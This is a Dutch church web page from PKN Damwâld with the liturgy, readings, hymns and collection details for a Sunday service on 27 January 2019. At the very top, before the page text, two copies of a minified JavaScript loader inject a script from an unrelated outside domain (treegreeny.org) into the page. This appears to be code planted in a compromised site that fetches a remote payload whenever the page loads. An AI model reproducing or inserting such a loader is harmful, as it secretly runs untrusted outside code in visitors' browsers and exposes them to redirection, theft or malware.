;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 27 januari 2019 9:30 uur - PKN Damwâld
zondag 27 januari 2019
09:30 uur

Kerkdienst zondag 27 januari 2019 9:30 uur

Thema: Kerk School en Gezin

Informatie

Voorganger:Ds. G.J. Otter
Organist:Jaap van der Horn
Thema:Kerk School en Gezin
Liturgie
Lied voor de dienst Elb 188
Welkom / Stil gebed / votum / groet
We zingen: Bid - Bid
Gebed
We zingen: Elke stap
Sketch met koffer
We zingen: ELB 448: 1, 2, 3
We lezen: Genesis 12: 1-9
We zingen: ELB 42: 1, 2, 3
Preek .
We zingen: ELB 443: 1, 2, 3
Filmpje van Onze Vader
Dankgebed
Collecte
Slotlied Ga met God
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Leprazending

Leprazending is een internationale Christelijke organisatie tégen lepra, met aandacht en liefde voor de individuele patiënt. Leprazending wil leprapatiënten medisch, sociaal en geestelijk bijstaan. Leprazending streeft ernaar om Gods liefde zichtbaar en tastbaar te maken voor mensen die zich verstoten voelen. Leprazending gaat verder dan medische zorg. Leprazending wil leprapatiënten een nieuw leven bieden, een nieuw geluk. Leprazending doet dat door bijvoorbeeld opleidingen te verzorgen, en microkredieten te verstrekken. Leprazending richt zoveel mogelijk op de behoeften van de individuele patiënten.

Tweede collecte: Kerk
Uitganscollecte: Kerk